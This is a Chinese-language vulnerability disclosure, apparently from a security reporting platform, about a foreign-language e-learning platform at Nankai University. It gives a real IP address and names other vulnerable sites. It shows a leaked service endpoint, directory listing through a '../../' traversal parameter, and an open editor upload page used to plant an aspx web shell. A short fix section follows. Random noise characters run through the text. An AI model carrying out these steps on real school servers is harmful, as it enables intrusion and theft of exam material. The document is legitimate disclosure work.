好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
! Y2 K2 [7 r( ~. G% i9 T- r7 \# z) i. ^1 c* S
详细说明:
4 I5 O& q2 S) n4 ^
2 \9 S1 z5 u* n+ _以南开大学的为例: 8 L, }7 i4 i9 r1 @. h4 \% g6 r
http://222.30.60.3/NPELS) p2 n0 E6 m/ j' X+ [: P8 v
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址- ]/ V. o, s& M0 O1 d
<setting name="Update_CommonSvr_CommonService" serializeAs="String">1 B1 W3 R3 M' e
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>: O5 p3 u2 @, p
</setting>
5 ]' o# x9 C3 A8 q" S/ y0 |% B及版本号9 y! a* ]6 I. l6 K: ~. n3 t
<add key="TVersion" value="1, 0, 0, 2187">
. a; C: h% ~# X& i) ?% r</add>2 r! G) F9 L J' K+ q9 O- I
直接访问
) k( S% g( }; u7 n) _http://222.30.60.3/NPELS/CommonService.asmx
7 D) f* A$ x }1 m8 R* m' p# c使用GetTestClientFileList操作,直接 HTTP GET 列目录:& v L/ I/ r- ^
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
9 g u2 t) H+ U. D: [. I5 n& A进一步列目录(返回的网页很大,可以直接 wget 下来)
$ w# t- z4 ?! {1 Phttp://222.30.60.3/NPELS/CommonS ... List?version=../../
% n+ E6 ?! t+ |/ A% }. X. J " m: d& ^3 Q3 W w8 s7 [
发现
8 X0 U: S- h, ~" x. T) _http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
+ o0 I4 h1 R! z' E g. `& l( l# a0 d" t可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头* y" l% J( @$ @1 s# _: h
上传后继续列目录找到木马地址直接访问即可% i# y% }* W1 Q/ x8 y
: K$ ?8 h6 p' }OOXX
0 t) U% L* v& q: K o0 o
4 H; K5 n9 r$ \9 j. pGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法7 }7 c: c6 q6 ]5 G& p$ n+ e
漏洞证明:
# E6 m* X8 A7 D9 R& n! T / O8 x0 }6 J& j& ^( [4 i2 U
列目录:. J" i6 y4 p+ V
http://222.30.60.3/NPELS/CommonS ... List?version=../../
% i- N* Q# m4 P1 h文件上传:
$ g9 r' k* S7 J( T7 _http://222.30.60.3/npelsv/editor/editor.htm
P1 ?, w/ R* W 7 }$ H6 Q; @" N; Y: `# E
上传木马:
8 x5 S7 u1 U6 D$ Phttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
- V/ _ A9 t& O: w' e9 w, Q 2 o# k; t. C% b6 O/ q
修复方案:+ t7 X6 E7 p( X- q$ F
好像考试系统必须使用 CommonService.asmx
" |( I. C) {7 q8 ~8 C4 N5 L最好配置文件加密或者用别的方式不让它泄露出来
6 r- Z k* }. I% N& Z, F并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样2 T, t" _5 L/ e5 V7 o- M1 j2 f O) t
|